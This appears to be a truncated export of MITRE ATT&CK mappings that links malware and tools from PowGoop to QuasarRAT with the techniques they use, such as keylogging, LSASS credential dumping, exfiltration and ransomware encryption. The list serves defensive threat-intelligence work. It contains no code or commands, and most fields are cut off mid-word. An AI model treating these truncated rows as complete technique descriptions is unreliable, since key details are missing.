S1046 PowGoop malware-- software uses T1036.005Match Legiattack-pat technique [PowGoop](
S1046 PowGoop malware-- software uses T1132.002Non-Standaattack-pat technique [PowGoop](
S1046 PowGoop malware-- software uses T1059.001PowerShellattack-pat technique [PowGoop](
S1046 PowGoop malware-- software uses T1071.001Web Protocattack-pat technique [PowGoop](
S0177 Power Loa malware-- software uses T1055.011Extra Windattack-pat technique [Power Loa
S0139 PowerDukemalware--0software uses T1010 Applicatio attack-pat technique [PowerDuke
S0139 PowerDukemalware--0software uses T1485 Data Destrattack-pat technique [PowerDuke
S0139 PowerDukemalware--0software uses T1070.004File Deleti attack-pat technique [PowerDuke
S0139 PowerDukemalware--0software uses T1083 File and Di attack-pat technique [PowerDuke]
S0139 PowerDukemalware--0software uses T1105 Ingress Tooattack-pat technique [PowerDuke
S0139 PowerDukemalware--0software uses T1564.004NTFS File Aattack-pat technique [PowerDuke
S0139 PowerDukemalware--0software uses T1057 Process Di attack-pat technique [PowerDuke
S0139 PowerDukemalware--0software uses T1547.001Registry Ruattack-pat technique [PowerDuke
S0139 PowerDukemalware--0software uses T1218.011Rundll32 attack-pat technique [PowerDuke
S0139 PowerDukemalware--0software uses T1027.003Steganogr attack-pat technique [PowerDuke
S0139 PowerDukemalware--0software uses T1082 System Inf attack-pat technique [PowerDuke
S0139 PowerDukemalware--0software uses T1016 System Netattack-pat technique [PowerDuke
S0139 PowerDukemalware--0software uses T1033 System Own attack-pat technique [PowerDuke
S0139 PowerDukemalware--0software uses T1124 System Timattack-pat technique [PowerDuke
S0139 PowerDukemalware--0software uses T1059.003Windows Cattack-pat technique [PowerDuke
S1012 PowerLessmalware--3software uses T1560 Archive Coattack-pat technique [PowerLess]
S1012 PowerLessmalware--3software uses T1217 Browser Inattack-pat technique [PowerLess
[PowerLess](https://attack.m
S1012 PowerLessmalware--3software uses T1005 Data from attack-pat technique
S1012 PowerLessmalware--3software uses T1140 Deobfuscatattack-pat technique [PowerLess
S1012 PowerLessmalware--3software uses T1573 Encrypted attack-pat technique [PowerLess
S1012 PowerLessmalware--3software uses T1105 Ingress Tooattack-pat technique [PowerLess
S1012 PowerLessmalware--3software uses T1056.001Keyloggingattack-pat technique [PowerLess
S1012 PowerLessmalware--3software uses T1074.001Local Data attack-pat technique [PowerLess
S1012 PowerLessmalware--3software uses T1059.001PowerShellattack-pat technique [PowerLess]
S0685 PowerPuncmalware-- software uses T1027.010Command aOttack-pat technique [PowerPunc
S0685 PowerPuncmalware-- software uses T1480.001Environmen attack-pat technique [PowerPunch
S0685 PowerPuncmalware-- software uses T1105 Ingress Tooattack-pat technique [PowerPunc
S0685 PowerPuncmalware-- software uses T1059.001PowerShellattack-pat technique [PowerPunch
S0441 PowerShowmalware-- software uses T1560.001Archive viaattack-pat technique [PowerShowe
S0441 PowerShowmalware-- software uses T1041 Exfiltratio attack-pat technique [PowerShowe
S0441 PowerShowmalware-- software uses T1070.004File Deleti attack-pat technique [PowerShowe
S0441 PowerShowmalware-- software uses T1564.003Hidden Wi attack-pat technique [PowerShowe
S0441 PowerShowmalware-- software uses T1112 Modify Regattack-pat technique [PowerShowe
S0441 PowerShowmalware-- software uses T1059.001PowerShellattack-pat technique [PowerShow
S0441 PowerShowmalware-- software uses T1057 Process Di attack-pat technique [PowerShowe
S0441 PowerShowmalware-- software uses T1547.001Registry Ruattack-pat technique [PowerShowe
S0441 PowerShowmalware-- software uses T1132.001Standard Eattack-pat technique [PowerShow
S0441 PowerShowmalware-- software uses T1082 System Inf attack-pat technique [PowerShow
S0441 PowerShowmalware-- software uses T1016 System Netattack-pat technique [PowerShowe
S0441 PowerShowmalware-- software uses T1033 System Own attack-pat technique [PowerShowe
S0441 PowerShowmalware-- software uses T1059.005Visual Basiattack-pat technique [PowerShowe
S0441 PowerShowmalware-- software uses T1071.001Web Protocattack-pat technique [PowerShow
S0194 PowerSploitool--13cd software uses T1134 Access Tokattack-pat technique [PowerSplo
S0194 PowerSploitool--13cd software uses T1123 Audio Captattack-pat technique [PowerSplo
S0194 PowerSploitool--13cd software uses T1027.010Command aOttack-pat technique [PowerSploi
S0194 PowerSploitool--13cd software uses T1552.002Credentialsattack-pat technique [PowerSplo
S0194 PowerSploitool--13cd software uses T1574.001DLL Searchattack-pat technique [PowerSploi
S0194 PowerSploitool--13cd software uses T1005 Data from attack-pat technique [PowerSploi
S0194 PowerSploitool--13cd software uses T1482 Domain Truattack-pat technique [PowerSplo
S0194 PowerSploitool--13cd software uses T1055.001Dynamic-linattack-pat technique [PowerSploi
S0194 PowerSploitool--13cd software uses T1552.006Group Poliattack-pat technique [PowerSploi
S0194 PowerSploitool--13cd software uses T1027.005Indicator attack-pat technique [PowerSplo
S0194 PowerSploitool--13cd software uses T1558.003Kerberoastattack-pat technique [PowerSploi
S0194 PowerSploitool--13cd software uses T1056.001Keyloggingattack-pat technique [PowerSplo
S0194 PowerSploitool--13cd software uses T1003.001LSASS Memattack-pat technique [PowerSploi
S0194 PowerSploitool--13cd software uses T1087.001Local Acco attack-pat technique [PowerSplo
S0194 PowerSploitool--13cd software uses T1574.007Path Inter attack-pat technique [PowerSploi
S0194 PowerSploitool--13cd software uses T1574.008Path Intercattack-pat technique [PowerSploi
S0194 PowerSploitool--13cd software uses T1574.009Path Inter attack-pat technique [PowerSploi
S0194 PowerSploitool--13cd software uses T1059.001PowerShellattack-pat technique [PowerSplo
S0194 PowerSploitool--13cd software uses T1057 Process Di attack-pat technique [PowerSplo
S0194 PowerSploitool--13cd software uses T1012 Query Regiattack-pat technique [PowerSploi
S0194 PowerSploitool--13cd software uses T1620 Reflective attack-pat technique [PowerSploi
S0194 PowerSploitool--13cd software uses T1547.001Registry Ruattack-pat technique [PowerSplo
S0194 PowerSploitool--13cd software uses T1053.005Scheduled attack-pat technique [PowerSplo
S0194 PowerSploitool--13cd software uses T1113 Screen Capattack-pat technique [PowerSplo
S0194 PowerSploitool--13cd software uses T1547.005Security Suattack-pat technique [PowerSploi
S0194 PowerSploitool--13cd software uses T1555.004Windows Cattack-pat technique [PowerSploi
S0194 PowerSploitool--13cd software uses T1047 Windows M attack-pat technique [PowerSplo
S0194 PowerSploitool--13cd software uses T1543.003Windows Se attack-pat technique [PowerSploi
S0393 PowerStallmalware-- software uses T1102.002Bidirectio attack-pat technique [PowerStal
S0393 PowerStallmalware-- software uses T1027 Obfuscatedattack-pat technique [PowerStall
S0393 PowerStallmalware-- software uses T1059.001PowerShellattack-pat technique [PowerStall
S0393 PowerStallmalware-- software uses T1057 Process Di attack-pat technique [PowerStall
S0393 PowerStallmalware-- software uses T1070.006Timestompattack-pat technique [PowerStall
S1058 Prestige malware-- software uses T1486 Data Encryattack-pat technique [Prestige](
S1058 Prestige malware-- software uses T1083 File and Di attack-pat technique [Prestige](
S1058 Prestige malware-- software uses T1484.001Group Poliattack-pat technique [Prestige]
[Prestige](https://attack.mitr
S1058 Prestige malware-- software uses T1490 Inhibit Sy attack-pat technique
S1058 Prestige malware-- software uses T1112 Modify Regattack-pat technique [Prestige](
S1058 Prestige malware-- software uses T1106 Native API attack-pat technique [Prestige]
S1058 Prestige malware-- software uses T1059.001PowerShellattack-pat technique [Prestige](
S1058 Prestige malware-- software uses T1053.005Scheduled attack-pat technique [Prestige]
S1058 Prestige malware-- software uses T1489 Service Stoattack-pat technique [Prestige]
S0113 Prikormka malware--3software uses T1560 Archive Coattack-pat technique After colle
S0113 Prikormka malware--3software uses T1555 Credential attack-pat technique A module in
S0113 Prikormka malware--3software uses T1555.003Credential attack-pat technique A module in
S0113 Prikormka malware--3software uses T1574.001DLL Searchattack-pat technique [Prikormka]
S0113 Prikormka malware--3software uses T1025 Data from attack-pat technique [Prikormka]
S0113 Prikormka malware--3software uses T1027.013Encrypted/attack-pat technique Some resou
S0113 Prikormka malware--3software uses T1070.004File Deleti attack-pat technique After encry
S0113 Prikormka malware--3software uses T1083 File and Di attack-pat technique A module in
S0113 Prikormka malware--3software uses T1056.001Keyloggingattack-pat technique [Prikormka]
S0113 Prikormka malware--3software uses T1074.001Local Data attack-pat technique [Prikormka
S0113 Prikormka malware--3software uses T1120 Peripheral attack-pat technique A module in
S0113 Prikormka malware--3software uses T1547.001Registry Ruattack-pat technique [Prikormka]
S0113 Prikormka malware--3software uses T1218.011Rundll32 attack-pat technique [Prikormka]
S0113 Prikormka malware--3software uses T1113 Screen Capattack-pat technique [Prikormka]
S0113 Prikormka malware--3software uses T1518.001Security S attack-pat technique A module in
S0113 Prikormka malware--3software uses T1132.001Standard Eattack-pat technique [Prikormka]
S0113 Prikormka malware--3software uses T1573.001Symmetric attack-pat technique [Prikormka]
S0113 Prikormka malware--3software uses T1082 System Inf attack-pat technique A module i
S0113 Prikormka malware--3software uses T1016 System Netattack-pat technique A module in
S0113 Prikormka malware--3software uses T1033 System Own attack-pat technique A module in
S0654 ProLock malware-- software uses T1197 BITS Jobs attack-pat technique [ProLock](
S0654 ProLock malware-- software uses T1486 Data Encryattack-pat technique [ProLock](
S0654 ProLock malware-- software uses T1068 Exploitatioattack-pat technique [ProLock](
S0654 ProLock malware-- software uses T1070.004File Deleti attack-pat technique [ProLock](h
S0654 ProLock malware-- software uses T1490 Inhibit Sy attack-pat technique [ProLock](
S0654 ProLock malware-- software uses T1027.003Steganogr attack-pat technique [ProLock](h
S0654 ProLock malware-- software uses T1047 Windows M attack-pat technique [ProLock](
S0279 Proton malware-- software uses T1560 Archive Coattack-pat technique [Proton](ht
S0279 Proton malware-- software uses T1070.002Clear Linu attack-pat technique [Proton](h
S0279 Proton malware-- software uses T1555.003Credential attack-pat technique [Proton](h
S0279 Proton malware-- software uses T1140 Deobfuscatattack-pat technique [Proton](ht
S0279 Proton malware-- software uses T1562.001Disable or attack-pat technique [Proton](ht
S0279 Proton malware-- software uses T1070.004File Deleti attack-pat technique [Proton](ht
S0279 Proton malware-- software uses T1056.002GUI Input attack-pat technique [Proton](ht
S0279 Proton malware-- software uses T1555.001Keychain attack-pat technique [Proton](ht
S0279 Proton malware-- software uses T1056.001Keyloggingattack-pat technique [Proton](ht
S0279 Proton malware-- software uses T1543.001Launch Ageattack-pat technique [Proton](ht
S0279 Proton malware-- software uses T1555.005Password attack-pat technique [Proton](ht
S0279 Proton malware-- software uses T1113 Screen Capattack-pat technique [Proton](ht
S0279 Proton malware-- software uses T1548.003Sudo and Sattack-pat technique [Proton](ht
S0279 Proton malware-- software uses T1059.004Unix Shell attack-pat technique [Proton](ht
S0279 Proton malware-- software uses T1021.005VNC attack-pat technique [Proton](h
S0238 Proxysvc malware-- software uses T1119 Automatedattack-pat technique [Proxysvc](
S0238 Proxysvc malware-- software uses T1485 Data Destrattack-pat technique [Proxysvc](
S0238 Proxysvc malware-- software uses T1005 Data from attack-pat technique [Proxysvc](
S0238 Proxysvc malware-- software uses T1041 Exfiltratio attack-pat technique [Proxysvc](
S0238 Proxysvc malware-- software uses T1070.004File Deleti attack-pat technique [Proxysvc](
S0238 Proxysvc malware-- software uses T1083 File and Di attack-pat technique [Proxysvc](
S0238 Proxysvc malware-- software uses T1057 Process Di attack-pat technique [Proxysvc](
S0238 Proxysvc malware-- software uses T1012 Query Regiattack-pat technique [Proxysvc]
S0238 Proxysvc malware-- software uses T1569.002Service Ex attack-pat technique [Proxysvc](
S0238 Proxysvc malware-- software uses T1082 System Inf attack-pat technique [Proxysvc](
S0238 Proxysvc malware-- software uses T1016 System Netattack-pat technique [Proxysvc]
S0238 Proxysvc malware-- software uses T1124 System Timattack-pat technique As part of
S0238 Proxysvc malware-- software uses T1071.001Web Protocattack-pat technique [Proxysvc]
S0238 Proxysvc malware-- software uses T1059.003Windows Cattack-pat technique [Proxysvc]
S0029 PsExec tool--ff6c software uses T1136.002Domain Acattack-pat technique [PsExec](ht
S0029 PsExec tool--ff6c software uses T1570 Lateral Tooattack-pat technique [PsExec](ht
S0029 PsExec tool--ff6c software uses T1021.002SMB/Windo attack-pat technique [PsExec](h
S0029 PsExec tool--ff6c software uses T1569.002Service Ex attack-pat technique Microsoft S
S0029 PsExec tool--ff6c software uses T1543.003Windows Se attack-pat technique [PsExec](ht
S0078 Psylo malware--dsoftware uses T1041 Exfiltratio attack-pat technique [Psylo](htt
S0078 Psylo malware--dsoftware uses T1083 File and Di attack-pat technique [Psylo](htt
S0078 Psylo malware--dsoftware uses T1105 Ingress Tooattack-pat technique [Psylo](htt
S0078 Psylo malware--dsoftware uses T1070.006Timestompattack-pat technique [Psylo](htt
S0078 Psylo malware--dsoftware uses T1071.001Web Protocattack-pat technique [Psylo](htt
S0147 Pteranodomalware-- software uses T1140 Deobfuscatattack-pat technique [Pteranodon
S0147 Pteranodomalware-- software uses T1027.007Dynamic APattack-pat technique [Pteranodo
S0147 Pteranodomalware-- software uses T1041 Exfiltratio attack-pat technique [Pteranodon
S0147 Pteranodomalware-- software uses T1070.004File Deleti attack-pat technique [Pteranodon
S0147 Pteranodomalware-- software uses T1083 File and Di attack-pat technique [Pteranodon
S0147 Pteranodomalware-- software uses T1105 Ingress Tooattack-pat technique [Pteranodo
S0147 Pteranodomalware-- software uses T1074.001Local Data attack-pat technique [Pteranodo
S0147 Pteranodomalware-- software uses T1218.005Mshta attack-pat technique [Pteranodo
S0147 Pteranodomalware-- software uses T1106 Native API attack-pat technique [Pteranodon
S0147 Pteranodomalware-- software uses T1547.001Registry Ruattack-pat technique [Pteranodon
S0147 Pteranodomalware-- software uses T1218.011Rundll32 attack-pat technique [Pteranodon
S0147 Pteranodomalware-- software uses T1053.005Scheduled attack-pat technique [Pteranodo
S0147 Pteranodomalware-- software uses T1113 Screen Capattack-pat technique [Pteranodon
S0147 Pteranodomalware-- software uses T1497 Virtualiza attack-pat technique [Pteranodon
S0147 Pteranodomalware-- software uses T1059.005Visual Basiattack-pat technique [Pteranodo
S0147 Pteranodomalware-- software uses T1071.001Web Protocattack-pat technique [Pteranodo
S0147 Pteranodomalware-- software uses T1059.003Windows Cattack-pat technique [Pteranodo
S0192 Pupy tool--cb6 software uses T1560.001Archive viaattack-pat technique [Pupy](http
S0192 Pupy tool--cb6 software uses T1573.002Asymmetricattack-pat technique [Pupy](http
S0192 Pupy tool--cb6 software uses T1123 Audio Captattack-pat technique [Pupy](htt
S0192 Pupy tool--cb6 software uses T1548.002Bypass Useattack-pat technique [Pupy](htt
S0192 Pupy tool--cb6 software uses T1003.005Cached Dom attack-pat technique [Pupy](http
S0192 Pupy tool--cb6 software uses T1070.001Clear Windattack-pat technique [Pupy](http
S0192 Pupy tool--cb6 software uses T1552.001Credentialsattack-pat technique [Pupy](http
S0192 Pupy tool--cb6 software uses T1555 Credential attack-pat technique [Pupy](http
S0192 Pupy tool--cb6 software uses T1555.003Credential attack-pat technique [Pupy](http
S0192 Pupy tool--cb6 software uses T1136.002Domain Acattack-pat technique [Pupy](htt
S0192 Pupy tool--cb6 software uses T1055.001Dynamic-linattack-pat technique [Pupy](http
S0192 Pupy tool--cb6 software uses T1041 Exfiltratio attack-pat technique [Pupy](http
S0192 Pupy tool--cb6 software uses T1083 File and Di attack-pat technique [Pupy](http
S0192 Pupy tool--cb6 software uses T1105 Ingress Tooattack-pat technique [Pupy](htt
S0192 Pupy tool--cb6 software uses T1056.001Keyloggingattack-pat technique [Pupy](http
S0192 Pupy tool--cb6 software uses T1557.001LLMNR/NBT attack-pat technique [Pupy](http
S0192 Pupy tool--cb6 software uses T1003.004LSA Secret attack-pat technique [Pupy](http
S0192 Pupy tool--cb6 software uses T1003.001LSASS Memattack-pat technique [Pupy](http
S0192 Pupy tool--cb6 software uses T1087.001Local Acco attack-pat technique [Pupy](htt
S0192 Pupy tool--cb6 software uses T1136.001Local Acco attack-pat technique [Pupy](htt
S0192 Pupy tool--cb6 software uses T1114.001Local Emailattack-pat technique [Pupy](http
S0192 Pupy tool--cb6 software uses T1046 Network Seattack-pat technique [Pupy](http
S0192 Pupy tool--cb6 software uses T1135 Network Shattack-pat technique [Pupy](http
S0192 Pupy tool--cb6 software uses T1550.003Pass the Tiattack-pat technique [Pupy](http
S0192 Pupy tool--cb6 software uses T1059.001PowerShellattack-pat technique [Pupy](http
S0192 Pupy tool--cb6 software uses T1057 Process Di attack-pat technique [Pupy](http
S0192 Pupy tool--cb6 software uses T1059.006Python attack-pat technique [Pupy](http
S0192 Pupy tool--cb6 software uses T1547.001Registry Ruattack-pat technique [Pupy](http
S0192 Pupy tool--cb6 software uses T1021.001Remote Des attack-pat technique [Pupy](http
S0192 Pupy tool--cb6 software uses T1113 Screen Capattack-pat technique [Pupy](http
S0192 Pupy tool--cb6 software uses T1569.002Service Ex attack-pat technique [Pupy](htt
S0192 Pupy tool--cb6 software uses T1497.001System Cheattack-pat technique [Pupy](http
S0192 Pupy tool--cb6 software uses T1082 System Inf attack-pat technique [Pupy](http
S0192 Pupy tool--cb6 software uses T1016 System Netattack-pat technique [Pupy](http
S0192 Pupy tool--cb6 software uses T1049 System Netattack-pat technique [Pupy](http
S0192 Pupy tool--cb6 software uses T1033 System Own attack-pat technique [Pupy](http
S0192 Pupy tool--cb6 software uses T1543.002Systemd Seattack-pat technique [Pupy](http
S0192 Pupy tool--cb6 software uses T1134.001Token Impeattack-pat technique [Pupy](http
S0192 Pupy tool--cb6 software uses T1125 Video Captattack-pat technique [Pupy](htt
S0192 Pupy tool--cb6 software uses T1071.001Web Protocattack-pat technique [Pupy](htt
S0192 Pupy tool--cb6 software uses T1547.013XDG Autostattack-pat technique [Pupy](http
S1032 PyDCrypt malware-- software uses T1140 Deobfuscatattack-pat technique [PyDCrypt]
S1032 PyDCrypt malware-- software uses T1562.004Disable or attack-pat technique [PyDCrypt]
S1032 PyDCrypt malware-- software uses T1027.013Encrypted/attack-pat technique [PyDCrypt](
S1032 PyDCrypt malware-- software uses T1070.004File Deleti attack-pat technique [PyDCrypt](
[PyDCrypt](https://attack.mit
S1032 PyDCrypt malware-- software uses T1036.005Match Legiattack-pat technique
S1032 PyDCrypt malware-- software uses T1059.001PowerShellattack-pat technique [PyDCrypt]
S1032 PyDCrypt malware-- software uses T1059.006Python attack-pat technique [PyDCrypt](
S1032 PyDCrypt malware-- software uses T1049 System Netattack-pat technique [PyDCrypt]
S1032 PyDCrypt malware-- software uses T1033 System Own attack-pat technique [PyDCrypt]
S1032 PyDCrypt malware-- software uses T1059.003Windows Cattack-pat technique [PyDCrypt](
S1032 PyDCrypt malware-- software uses T1047 Windows M attack-pat technique [PyDCrypt]
S0583 Pysa malware--asoftware uses T1110 Brute Forc attack-pat technique [Pysa](http
S0583 Pysa malware--asoftware uses T1552.001Credentialsattack-pat technique [Pysa](http
S0583 Pysa malware--asoftware uses T1486 Data Encryattack-pat technique [Pysa](http
S0583 Pysa malware--asoftware uses T1562.001Disable or attack-pat technique [Pysa](http
S0583 Pysa malware--asoftware uses T1070.004File Deleti attack-pat technique [Pysa](http
S0583 Pysa malware--asoftware uses T1490 Inhibit Sy attack-pat technique [Pysa](http
S0583 Pysa malware--asoftware uses T1003.001LSASS Memattack-pat technique [Pysa](http
S0583 Pysa malware--asoftware uses T1036.005Match Legiattack-pat technique [Pysa](http
S0583 Pysa malware--asoftware uses T1112 Modify Regattack-pat technique [Pysa](htt
S0583 Pysa malware--asoftware uses T1046 Network Seattack-pat technique [Pysa](htt
S0583 Pysa malware--asoftware uses T1059.001PowerShellattack-pat technique [Pysa](http
S0583 Pysa malware--asoftware uses T1059.006Python attack-pat technique [Pysa](http
S0583 Pysa malware--asoftware uses T1021.001Remote Des attack-pat technique [Pysa](http
S0583 Pysa malware--asoftware uses T1569.002Service Ex attack-pat technique [Pysa](http
S0583 Pysa malware--asoftware uses T1489 Service Stoattack-pat technique [Pysa](http
S0583 Pysa malware--asoftware uses T1016 System Netattack-pat technique [Pysa](http
S0269 QUADAGENmalware-- software uses T1027.010Command aOttack-pat technique [QUADAGENT
S0269 QUADAGENmalware-- software uses T1071.004DNS attack-pat technique [QUADAGENT
S0269 QUADAGENmalware-- software uses T1140 Deobfuscatattack-pat technique [QUADAGENT
S0269 QUADAGENmalware-- software uses T1008 Fallback C attack-pat technique [QUADAGENT]
S0269 QUADAGENmalware-- software uses T1070.004File Deleti attack-pat technique [QUADAGENT
S0269 QUADAGENmalware-- software uses T1027.011Fileless St attack-pat technique [QUADAGENT
S0269 QUADAGENmalware-- software uses T1036.005Match Legiattack-pat technique [QUADAGENT
S0269 QUADAGENmalware-- software uses T1112 Modify Regattack-pat technique [QUADAGENT
S0269 QUADAGENmalware-- software uses T1059.001PowerShellattack-pat technique [QUADAGENT
S0269 QUADAGENmalware-- software uses T1012 Query Regiattack-pat technique [QUADAGENT]
S0269 QUADAGENmalware-- software uses T1053.005Scheduled attack-pat technique [QUADAGENT
S0269 QUADAGENmalware-- software uses T1132.001Standard Eattack-pat technique [QUADAGENT
S0269 QUADAGENmalware-- software uses T1016 System Netattack-pat technique [QUADAGENT
S0269 QUADAGENmalware-- software uses T1033 System Own attack-pat technique [QUADAGENT
S0269 QUADAGENmalware-- software uses T1059.005Visual Basiattack-pat technique [QUADAGENT
S0269 QUADAGENmalware-- software uses T1071.001Web Protocattack-pat technique [QUADAGENT
S0269 QUADAGENmalware-- software uses T1059.003Windows Cattack-pat technique [QUADAGENT
S1076 QUIETCANmalware-- software uses T1074 Data Stageattack-pat technique [QUIETCANAR
S1076 QUIETCANmalware-- software uses T1140 Deobfuscatattack-pat technique [QUIETCANA
S1076 QUIETCANmalware-- software uses T1564.003Hidden Wi attack-pat technique [QUIETCANA
S1076 QUIETCANmalware-- software uses T1106 Native API attack-pat technique [QUIETCANA
S1076 QUIETCANmalware-- software uses T1012 Query Regiattack-pat technique [QUIETCANAR
S1076 QUIETCANmalware-- software uses T1132.001Standard Eattack-pat technique [QUIETCANA
S1076 QUIETCANmalware-- software uses T1573.001Symmetric attack-pat technique [QUIETCANA
S1076 QUIETCANmalware-- software uses T1016 System Netattack-pat technique [QUIETCANA
S1076 QUIETCANmalware-- software uses T1071.001Web Protocattack-pat technique [QUIETCANA
S1084 QUIETEXITmalware-- software uses T1071 Applicationattack-pat technique [QUIETEXIT]
S1084 QUIETEXITmalware-- software uses T1090.002External Prattack-pat technique [QUIETEXIT]
S1084 QUIETEXITmalware-- software uses T1008 Fallback C attack-pat technique [QUIETEXIT]
S1084 QUIETEXITmalware-- software uses T1036.005Match Legiattack-pat technique [QUIETEXIT]
S1084 QUIETEXITmalware-- software uses T1095 Non-Applicattack-pat technique [QUIETEXIT]
[QakBot](https://attack.mitre
S0650 QakBot malware-- software uses T1010 Applicatio attack-pat technique
S0650 QakBot malware-- software uses T1027.001Binary Padattack-pat technique [QakBot](h
S0650 QakBot malware-- software uses T1185 Browser Seattack-pat technique [QakBot](h
S0650 QakBot malware-- software uses T1110 Brute Forc attack-pat technique [QakBot](ht
[QakBot](https://attack.mitre
S0650 QakBot malware-- software uses T1553.002Code Signi attack-pat technique
S0650 QakBot malware-- software uses T1027.010Command aOttack-pat technique [QakBot](h
S0650 QakBot malware-- software uses T1555.003Credential attack-pat technique [QakBot](h
S0650 QakBot malware-- software uses T1574.002DLL Side-L attack-pat technique [QakBot](ht
S0650 QakBot malware-- software uses T1005 Data from attack-pat technique [QakBot](ht
S0650 QakBot malware-- software uses T1140 Deobfuscatattack-pat technique [QakBot](h
S0650 QakBot malware-- software uses T1562.001Disable or attack-pat technique [QakBot](ht
S0650 QakBot malware-- software uses T1568.002Domain Gen attack-pat technique [QakBot](h
S0650 QakBot malware-- software uses T1482 Domain Truattack-pat technique [QakBot](h
S0650 QakBot malware-- software uses T1041 Exfiltratio attack-pat technique [QakBot](h
S0650 QakBot malware-- software uses T1210 Exploitatioattack-pat technique [QakBot](ht
S0650 QakBot malware-- software uses T1090.002External Prattack-pat technique [QakBot](h
S0650 QakBot malware-- software uses T1070.004File Deleti attack-pat technique [QakBot](ht
S0650 QakBot malware-- software uses T1083 File and Di attack-pat technique [QakBot](ht
S0650 QakBot malware-- software uses T1027.011Fileless St attack-pat technique [QakBot](h
S0650 QakBot malware-- software uses T1027.006HTML Smugattack-pat technique [QakBot](ht
S0650 QakBot malware-- software uses T1564.001Hidden Fileattack-pat technique [QakBot](ht
S0650 QakBot malware-- software uses T1027.005Indicator attack-pat technique [QakBot](ht
S0650 QakBot malware-- software uses T1105 Ingress Tooattack-pat technique [QakBot](h
S0650 QakBot malware-- software uses T1016.001Internet C attack-pat technique [QakBot](h
S0650 QakBot malware-- software uses T1059.007JavaScript attack-pat technique The [QakBot
S0650 QakBot malware-- software uses T1056.001Keyloggingattack-pat technique [QakBot](h
S0650 QakBot malware-- software uses T1074.001Local Data attack-pat technique [QakBot](ht
S0650 QakBot malware-- software uses T1114.001Local Emailattack-pat technique [QakBot](ht
S0650 QakBot malware-- software uses T1069.001Local Grouattack-pat technique [QakBot](h
S0650 QakBot malware-- software uses T1204.002Malicious Fattack-pat technique [QakBot](h
[QakBot](https://attack.mitre
S0650 QakBot malware-- software uses T1204.001Malicious Lattack-pat technique
S0650 QakBot malware-- software uses T1553.005Mark-of-thattack-pat technique [QakBot](h
S0650 QakBot malware-- software uses T1036.008Masquerade attack-pat technique The [QakBot
S0650 QakBot malware-- software uses T1112 Modify Regattack-pat technique [QakBot](h
S0650 QakBot malware-- software uses T1218.007Msiexec attack-pat technique [QakBot](h
S0650 QakBot malware-- software uses T1106 Native API attack-pat technique [QakBot](h
S0650 QakBot malware-- software uses T1135 Network Shattack-pat technique [QakBot](h
S0650 QakBot malware-- software uses T1095 Non-Applicattack-pat technique [QakBot](ht
S0650 QakBot malware-- software uses T1027 Obfuscatedattack-pat technique [QakBot](ht
S0650 QakBot malware-- software uses T1120 Peripheral attack-pat technique [QakBot](ht
S0650 QakBot malware-- software uses T1059.001PowerShellattack-pat technique [QakBot](h
S0650 QakBot malware-- software uses T1057 Process Di attack-pat technique [QakBot](ht
S0650 QakBot malware-- software uses T1055.012Process Hoattack-pat technique [QakBot](ht
S0650 QakBot malware-- software uses T1055 Process Injattack-pat technique [QakBot](ht
S0650 QakBot malware-- software uses T1572 Protocol T attack-pat technique The [QakBo
S0650 QakBot malware-- software uses T1547.001Registry Ruattack-pat technique [QakBot](h
S0650 QakBot malware-- software uses T1218.010Regsvr32 attack-pat technique [QakBot](ht
S0650 QakBot malware-- software uses T1018 Remote Sysattack-pat technique [QakBot](h
S0650 QakBot malware-- software uses T1091 Replicatio attack-pat technique [QakBot](h
S0650 QakBot malware-- software uses T1218.011Rundll32 attack-pat technique [QakBot](ht
S0650 QakBot malware-- software uses T1053.005Scheduled attack-pat technique [QakBot](h
S0650 QakBot malware-- software uses T1518.001Security S attack-pat technique [QakBot](ht
S0650 QakBot malware-- software uses T1518 Software Dattack-pat technique [QakBot](h
S0650 QakBot malware-- software uses T1027.002Software Pattack-pat technique [QakBot](h
S0650 QakBot malware-- software uses T1566.001Spearphishattack-pat technique [QakBot](h
[QakBot](https://attack.mitre
S0650 QakBot malware-- software uses T1566.002Spearphishattack-pat technique
S0650 QakBot malware-- software uses T1132.001Standard Eattack-pat technique [QakBot](h
S0650 QakBot malware-- software uses T1539 Steal Web attack-pat technique [QakBot](ht
S0650 QakBot malware-- software uses T1573.001Symmetric attack-pat technique [QakBot](h
S0650 QakBot malware-- software uses T1497.001System Cheattack-pat technique [QakBot](ht
S0650 QakBot malware-- software uses T1082 System Inf attack-pat technique [QakBot](h
S0650 QakBot malware-- software uses T1016 System Netattack-pat technique [QakBot](h
S0650 QakBot malware-- software uses T1049 System Netattack-pat technique [QakBot](h
S0650 QakBot malware-- software uses T1033 System Own attack-pat technique [QakBot](h
S0650 QakBot malware-- software uses T1124 System Timattack-pat technique [QakBot](ht
S0650 QakBot malware-- software uses T1497.003Time Basedattack-pat technique The [QakBo
[QakBot](https://attack.mitre
S0650 QakBot malware-- software uses T1059.005Visual Basiattack-pat technique (Citation: Kroll Qakbot June 2
S0650 QakBot malware-- software uses T1071.001Web Protocattack-pat technique [QakBot](h
S0650 QakBot malware-- software uses T1059.003Windows Cattack-pat technique [QakBot](h
S0650 QakBot malware-- software uses T1047 Windows M attack-pat technique [QakBot](h
S0650 QakBot malware-- software uses T1543.003Windows Se attack-pat technique [QakBot](ht
S0262 QuasarRATtool--da04 software uses T1548.002Bypass Useattack-pat technique [QuasarRAT](https://attack.m
S0262 QuasarRATtool--da04 software uses T1553.002Code Signi attack-pat technique A [QuasarRA
S0262 QuasarRATtool--da04 software uses T1552.001Credentialsattack-pat technique [QuasarRAT
S0262 QuasarRATtool--da04 software uses T1555 Credential attack-pat technique [QuasarRAT
S0262 QuasarRATtool--da04 software uses T1555.003Credential attack-pat technique [QuasarRAT
S0262 QuasarRATtool--da04 software uses T1005 Data from attack-pat technique [QuasarRAT
S0262 QuasarRATtool--da04 software uses T1564.001Hidden Fileattack-pat technique [QuasarRAT](https://attack.m
S0262 QuasarRATtool--da04 software uses T1564.003Hidden Wi attack-pat technique [QuasarRAT
S0262 QuasarRATtool--da04 software uses T1105 Ingress Tooattack-pat technique [QuasarRAT
S0262 QuasarRATtool--da04 software uses T1056.001Keyloggingattack-pat technique [QuasarRAT]
S0262 QuasarRATtool--da04 software uses T1112 Modify Regattack-pat technique [QuasarRAT
S0262 QuasarRATtool--da04 software uses T1095 Non-Applicattack-pat technique [QuasarRAT
